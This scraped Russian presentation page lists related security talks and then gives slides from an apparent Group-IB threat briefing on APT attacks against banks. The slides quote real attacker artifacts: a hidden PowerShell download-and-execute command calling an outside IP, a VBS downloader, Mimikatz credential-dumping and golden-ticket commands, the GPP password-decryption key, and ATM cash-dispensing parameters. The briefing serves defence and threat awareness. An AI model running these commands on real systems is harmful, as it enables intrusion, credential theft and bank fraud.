UEBA (поведенческая аналитика в части ИБ): технологии обнаружения аномалий в ...Банковское обозрение
UEBA (поведенческая аналитика в части ИБ): технологии обнаружения аномалий в действиях авторизованного пользователя. Олег Бакшинский, , IBM Россия и СНГ
Для работы привилегированных пользователей создаются исключения в политиках безопасности и предоставляются преференции в ИТ-процессах. Средства защиты периметра обеспечивают привилегированным пользователям доступ внутрь сети и возможности удаления данных аудита, доступ к данным без уведомления. Получение доступа к контроллеру домена на основании доступного хэша пароля позволяет эскалировать привилегии существующих привилегированных учетных записей и создавать новые. Конечные точки создают плацдарм для атак, доступ к данным и средства эскалации привилегий вглубь инфраструктуры. Хищение привилегированных учетных данных и эскалация привилегий – сегодня являются основными причинами успешности атак.
UEBA (поведенческая аналитика в части ИБ): технологии обнаружения аномалий в ...Банковское обозрение
UEBA (поведенческая аналитика в части ИБ): технологии обнаружения аномалий в действиях авторизованного пользователя. Олег Бакшинский, , IBM Россия и СНГ
Для работы привилегированных пользователей создаются исключения в политиках безопасности и предоставляются преференции в ИТ-процессах. Средства защиты периметра обеспечивают привилегированным пользователям доступ внутрь сети и возможности удаления данных аудита, доступ к данным без уведомления. Получение доступа к контроллеру домена на основании доступного хэша пароля позволяет эскалировать привилегии существующих привилегированных учетных записей и создавать новые. Конечные точки создают плацдарм для атак, доступ к данным и средства эскалации привилегий вглубь инфраструктуры. Хищение привилегированных учетных данных и эскалация привилегий – сегодня являются основными причинами успешности атак.
Возможно SOC уже есть или SOC - мечта, однако существуют причины по которым вы его сделали или сделаете. У каждого человека - они разные. Лучше рассмотреть все варианты и выбрать свой путь.
CYBERARK - ЗАЩИТА ПРИВИЛЕГИРОВАННЫХ УЧЕТНЫХ ЗАПИСЕЙ ОТ ВНУТРЕННИХ И ВНЕШНИХ К...DialogueScience
Критически высокие риски информационной безопасности возникают в случае злоупотребления привилегиями и ненадлежащего контроля доступа к привилегированным учетным записям.
В данной сессии мы подробно рассмотрим архитектурные принципы построения защищённого корпоративного периметра, с разбором решения некоторых частных задач, характерных для периметра: контроль доступа пользователей в сеть Интернет, борьба с целенаправленными (APT) угрозами, защита web и email-трафика, средства объективного контроля сетевых процессов.
Целенаправленные атаки на мобильные устройстваDialogueScience
Мобильные устройства стали неотъемлемой частью повседневной жизни: кто-то использует смартфон, кто-то планшет, а некоторые - и то, и другое.
Кроме просмотра сайтов сети Интернет и работы с электронной почтой, мы используем мобильные устройства для бронирования отелей, покупки билетов, аренды машин. Мы используем мобильные устройства для доступа к нашим сбережениям, к нашим банковским счетам. Что, если вредоносный код, не определяемый антивирусом, находится в вашем смартфоне или планшете и что-то делает без вашего ведома? Чем может грозить нам и нашим деньгам эта скрытая активность? Что может произойти в этом случае?
Спикер: Николай Петров, заместитель генерального директора АО «ДиалогНаука» , CISSP
Когда тема SOC только обсуждалась на конференциях по информационной безопасности в России, Security Operations Center в компании МТС функционировал уже несколько лет. За эти годы мы накопили знания и опыт работы SOC в разнообразных ситуациях. С чем можно столкнуться при построении SOC? Какие особенности при реализации технологий и в бизнес-процессах нужно учитывать, обеспечивая безопасность IP/MPLS сети такого масштаба? Какие выводы мы сделали после участия в «Противостоянии» на PHDays VI? Ответы на эти и другие вопросы вы найдете в выступлении эксперта МТС.
Возможно SOC уже есть или SOC - мечта, однако существуют причины по которым вы его сделали или сделаете. У каждого человека - они разные. Лучше рассмотреть все варианты и выбрать свой путь.
CYBERARK - ЗАЩИТА ПРИВИЛЕГИРОВАННЫХ УЧЕТНЫХ ЗАПИСЕЙ ОТ ВНУТРЕННИХ И ВНЕШНИХ К...DialogueScience
Критически высокие риски информационной безопасности возникают в случае злоупотребления привилегиями и ненадлежащего контроля доступа к привилегированным учетным записям.
В данной сессии мы подробно рассмотрим архитектурные принципы построения защищённого корпоративного периметра, с разбором решения некоторых частных задач, характерных для периметра: контроль доступа пользователей в сеть Интернет, борьба с целенаправленными (APT) угрозами, защита web и email-трафика, средства объективного контроля сетевых процессов.
Целенаправленные атаки на мобильные устройстваDialogueScience
Мобильные устройства стали неотъемлемой частью повседневной жизни: кто-то использует смартфон, кто-то планшет, а некоторые - и то, и другое.
Кроме просмотра сайтов сети Интернет и работы с электронной почтой, мы используем мобильные устройства для бронирования отелей, покупки билетов, аренды машин. Мы используем мобильные устройства для доступа к нашим сбережениям, к нашим банковским счетам. Что, если вредоносный код, не определяемый антивирусом, находится в вашем смартфоне или планшете и что-то делает без вашего ведома? Чем может грозить нам и нашим деньгам эта скрытая активность? Что может произойти в этом случае?
Спикер: Николай Петров, заместитель генерального директора АО «ДиалогНаука» , CISSP
Когда тема SOC только обсуждалась на конференциях по информационной безопасности в России, Security Operations Center в компании МТС функционировал уже несколько лет. За эти годы мы накопили знания и опыт работы SOC в разнообразных ситуациях. С чем можно столкнуться при построении SOC? Какие особенности при реализации технологий и в бизнес-процессах нужно учитывать, обеспечивая безопасность IP/MPLS сети такого масштаба? Какие выводы мы сделали после участия в «Противостоянии» на PHDays VI? Ответы на эти и другие вопросы вы найдете в выступлении эксперта МТС.
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...Denis Batrankov, CISSP
Все маркетинговые презентации почти одинаковы и после того вы прослушали маркетинг, у вас должны быть уточняющие вопросы. Какие вопросы задают мне заказчики? А вот они.
FireEye - система защиты от целенаправленных атакDialogueScience
В настоящее время угрозы Advanced Persistent Threat (APT), связанные с целевыми атаками злоумышленников, использующие уязвимости «нулевого дня», являются наиболее опасными и актуальными для большинства компаний. В рамках вебинара будет рассмотрен способ защиты от подобного рода угроз с помощью системы FireEye.
14 мая прошел открытый вебинар InfoWatch, посвященный теме целенаправленных атак и защите от них. В ходе презентации ведущий рассказал, что представляют целенаправленные/APT атаки, каким образом их организуют, в чем мотивация преступников и как защититься от подобных атак.
Посмотреть запись вебинара Андрея Арефьева, менеджера по развитию продуктов InfoWatch, можно по ссылке http://www.infowatch.ru/webinar/tad
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...Ontico
РИТ++ 2017, секция ML + IoT + ИБ
Зал Белу-Оризонти, 5 июня, 13:00
Тезисы:
http://ritfest.ru/2017/abstracts/2798.html
В данном докладе будет рассмотрено множество вопросов, с которыми сталкивается AppSec-отдел - как генерировать анти-CSRF токены, где хранить секретные ключи, как тестировать безопасность в сжатые сроки и многое, многое другое.
Контрольный список для предотвращения атак программ-вымогателейCisco Russia
Готова ли ваша организация к отражению атак? Не тратьте время на обдумывание стратегии защиты. Приведенная ниже таблица поможет вам защититься от этих атак.
Fireeye 201FireEye - система защиты от целенаправленных атак5DialogueScience
Угрозы Advanced Persistent Threat (APT), связанные с целевыми атаками злоумышленников, использующие уязвимости «нулевого дня», являются наиболее опасными и актуальными для большинства компаний. В рамках вебинара рассмотрен способ защиты от подобного рода угроз с помощью системы FireEye.
Спикер: Николай Петров, CISSP, Заместитель Генерального директора, ЗАО «ДиалогНаука»
Продуктовая линейка компании «Код Безопасности» LETA IT-company
Презентация компании «Код Безопасности», проведенная в рамках конференции «Грани ИБ Законодательство, процессы, технологии» 13-15 октября 2011 г. в «Атлас Парк-Отель»
Как превратить свою сеть в систему информационной безопасности Cisco Russia
Смотреть запись: https://www.youtube.com/watch?v=Hc99vXpuvJk
Многие предприятия до сих пор строят свою систему защиты опираясь на уже устаревший периметровый подход, сосредотачивая все средства безопасности в одной-двух контрольных точках сети, полностью забывая про возможность обходных каналов - WiFi, флешек, 4G и т.п. Да и про внутреннего нарушителя, который уже находится внутри сети и может выполнять свое “черное дело”, не боясь быть обнаруженным периметровыми средствами защиты. Что делать в такой ситуации? Строить в внутренней сети еще одну, но уже наложенную систему безопасности? А может быть попробовать возложить эту задачу на то, что и так есть и во что инвестированы немалые средства? Речь идет о сетевой инфраструктуре, о маршрутизаторах, коммутаторах и точках доступа, которые могут не только передавать трафик из точки А в точку Б, но и эффективно защищать этот трафик, выполняя одновременно роль сенсора, защитной стены и инструмента реагирования на инциденты безопасности. Решения Cisco и подход “Сеть как система защиты” могут это!
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...Банковское обозрение
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного назначения: основные ценообразующие факторы и источники получения информации»
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...Банковское обозрение
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного назначения: основные ценообразующие факторы и источники получения информации»
Александр Слуцкий, НАОК: «Изменения в федеральный стандарт оценки «Оценка для...Банковское обозрение
Александр Слуцкий, НАОК: «Изменения в федеральный стандарт оценки «Оценка для целей залога», предлагаемые национальной Ассоциацией оценочных компаний финансовых рынков»
3. 3
Почему невозможно быть полностью защищенным
ТЫСЯЧИ
СОТРУДНИКОВ
Не все сотрудники
эксперты по безопасности.
Им надо получать и
открывать письма от
коллег, руководства и т.д.
для выполнения своих
служебных обязанностей
Атакующие могут
звонить прежде чем
отправить письмо,
воспользоваться
взломанной почтой
коллег
Многие просто покупают
решения по безопасности и
чувствуют себя
защищёнными, перекладывая
ответственность на вендора.
Нет процедуры реагирования
на инцидент
УМНЫЙ
ФИШИНГ
СТАРАЯ
ПАРАДИГМА
10 минут
время необходимое
для получения полного
контроля над сетью
4. 4
Шаблон атак легко копировать
1
Целевой фишинг,
покупка загрузок,
уязвимость во внешней
системе
Собирают реквизиты доступа к
центральным серверам и
пароли администраторов
использую открытую утилиту
Mimikatz
НАЧАЛЬНОЕ
ПРОНИКНОВЕНИЕ 2 УДАЛЕННЫЙ
ДОСТУП 3 ПОЛУЧЕНИЕ
ПРИВИЛЕГИЙ
6 ПРОТИВОДЕЙСТВИЕ
РАССЛЕДОВАНИЮ
Атакующие используют
удаленный доступ для
более глубокого
проникновения в сети
Атакующие ищут компьютеры с
которых можно получить
доступ к критичным системам
(АРМ КБР, SWIFT, карточный
процессинг, системы
управления банкоматами)
Получают доступ к
системам, как легитимный
оператор, наблюдают за
ним и выполняют те же
действия
Уничтожают данные после
атаки и компьютеры
5 ЗАВЕРШЕНИЕ
АТАКИ4 СБОР
ДАННЫХ
6. 6
Закрепление на локальной системе
ЭКСПЛОЙТ,
EXE, VBS-СКРИПТ
Троян в зашифрованном архиве
CVE-2015-1641
VBS скрипт
Вредоносный модуль
загружается и
храниться только в
оперативной памяти
Получение списка легитимного ПО в
автозагрузке и замена исполняемых
файлов:
• iusb3mon. exe (Intel(R) USB 3.0 eXtensible
Host Controller)
• jusched.exe (Sun Java Update Scheduler)
Либо создания задач в Windows Scheduler
ОПЕРАТИВНАЯ
ПАМЯТЬ
АВТОЗАГРУЗКА
И ЛЕГАЛЬНОЕ ПО
PowerShell скрипт:
«C:Windowssystem32cmd.exe - powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://84.200.84.241:800/arp'))»
VBS скрипт:
var u = 'https://filebin.net/1xpzydyqftzdm48k/cmd.exe'.split(',');for(i = 0; i < u.length; i++){try{var h = new
ActiveXObject('msxml2.xmlhttp');h.open('GET', u[i], false);h.send();if(h.status == 200 && h.responsetext.substr(0, 2) == 'MZ')
7. 7
Повышение привилегий
ОШИБКА КОНФИГУРАЦИИ
КОНТРОЛЛЕРА ДОМЕНА
• Использование Group Policy Preferences (GPP)
• «[server_name]sysvol[domain_name]Policies[group_policy_na
me]MachinePreferencesGroupsGroups.xml»
• Из файла Groups.xml они извлекают логин и пароль
администратора домена из полей cpassword и userName.
(пароль в зашифрованном с помощью AES-256 алгоритме и
закодированном по Base64)
• Для получения пароля в открытом виде атакующие
декодируют пароль по Base64
• Полученный зашифрованный пароль расшифровывается
с помощью ключа
4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a43
3b66c1b
8. 8
Повышение привилегий
УТИЛИТА MIMIKATZ
Есть доступ к DC
mimikatz sekurlsa::logonpasswords
Нет доступа к DC, но есть LA
Подключение к рабочим станциям и серверам с целью поиска
учетной записи с доступом к DC
Нет прав LA и нет доступа к DC
CVE-2014-4113, CVE-2015-1701, CVE-2015-2363 и CVE-2015-2426,
которые позволяли поднять привилегии до уровня SYSTEM на x32 и x64.
Если на локальной системе не работает, то подключается к другим хостам
пока не найдет уязвимый
Золотой билет
• "privilege::debug" "lsadump::samrpc /patch" exit
• извлечение NTLM-хеш учетной записи krbtgt (Key Distribution Center Service
Account)
• создают файл с золотым TGT билетом
9. 9
Поиск нужных систем с доступом к банкоматной сети
netscan.exe – сетевой сканнер NetScan
patch86.exe – патчинг Termsrv для поддержки одновременных терминальных сессий
plink.exe – консольный ssh клиент для Windows
psexec.exe – консольная утили для удаленного управления на Windows
11. 11
Программы для банкоматов
ServiceLogicalName - имя сервиса, используемое в качестве аргумента для функции WFSOpen (например «Cash Dispenser Module»).
Cassettes Count - общее число кассет, присутствующих на устройстве. Значение должно быть в интервале от 1 до 15.
Cassette Number - номер кассеты, из которой следует выдать наличность. Значение должно быть в интервале от 1 до 15.
Banknotes Count - число банкнот, которое необходимо выдать из кассеты. Значение должно быть в интервале от 1 до 60.
Dispenses Count - означает какое количество раз необходимо повторить выдачу наличности. Значение должно быть в интервале
от 1 до 60.
Программа, использует стандартные функции по интерфейсу
XFS через XFS Manager (eXtensions for Financial Services).
13. 13
Система выявления ранее неизвестного
вредоносного кода с использованием
передовых алгоритмов машинного обучения
Скачиваемые файлы
Объекты, скачиваемые
пользователями и их
компьютерами при атаке
их браузеров
и другие ранее неизвестные
вредоносные объекты,
не определяемые
антивирусами
и сигнатурным подходом.
Круглосуточная поддержка
вашей службы безопасности
и сопровождение процесса
реагирования опытными
специалистами Group-IB
Полная конфиденциальность
– обработка и анализ файлов
внутри вашего контура
безопасности
Почтовые вложения
Вредоносные файлы, получаемые
пользователями через почтовую
систему в ходе целевых атак и
применения социальной
инженерии
Целевые атаки
Вредоносное ПО, нацеленное
эксклюзивно на вашу
инфраструктуру
14. 1
4
Сенсор анализа трафика SOC GROUP-IB
Сведения об инцидентах, полученные от
сенсора, классифицируются и
коррелируются в Центре обработки данных.
События анализируются квалифицированными
специалистами Group-IB вручную.
Эксперты SOC уведомят ваших специалистов о
критичных угрозах по телефону и e-mail, а все
результаты анализа будут доступны в
удобном web-интерфейсе.
Опытные специалисты Group-IB берут
на себя работу по выявлению
критичных инцидентов, позволяя вашей
службе ИБ сосредоточиться на
реагировании.
выявляет зараженные узлы,
устанавливая их
взаимодействия
с командными центрами по
признакамвредоносной
активности, разрабатываемым
на основе данных из
уникальных источников.
детектирует сетевые аномалии,
генерируемые вредоносными
программами, при помощи
алгоритмов машинного
обучения.
интегрируется с системой
поведенческого анализа Polygon
для выявления ранее
неизвестного вредоносного
кода.
передает информацию
о выявленных инцидентах в
SOC Group-IB по безопасному
каналу либо в любую
внутреннюю корпоративную
систему учета событий ИБ.
Анализ данных ведется круглосуточно,
без выходных
Как работает TDS
22. Рассылка Cobalt 10 марта 2017г
Первая волна 10.03.2017, 12:57, Банк 1
Вторая волна 10.03.2017, 15:12, Банк 2
Адрес: media@ecb-europe.com
23. 23
Что делать, чтобы предотвратить APT атаку
КИБЕРРАЗВЕДКА ОБНАРУЖЕНИЕ
РЕАГИРОВАНИЕ
Отслеживайте появление новых
методов и инструментов атак
Используйте специальные системы
обнаружения целевых атак
При обнаружении следов атаки
вызывайте команду профессиональных
криминалистов
Присылайте подозрительные файлы
для анализа – intelligence@group-
ib.ru
АНАЛИЗ
Анализируйте подозрительные
файлы в изолированной среде
Запишитесь на бесплатный тест-драйв
комплекса TDS + Polygon - www.group-ib.ru/tds.html
ЦЕНТР РЕАГИРОВАНИЯ
CERT-GIB
Круглосуточная помощь
опытных специалистов
в реагировании на инциденты
РАССЛЕДОВАНИЯ
И КРИМИНАЛИСТИКА
Безупречный сбор доказательной
базы и оперативное установление
личностей преступников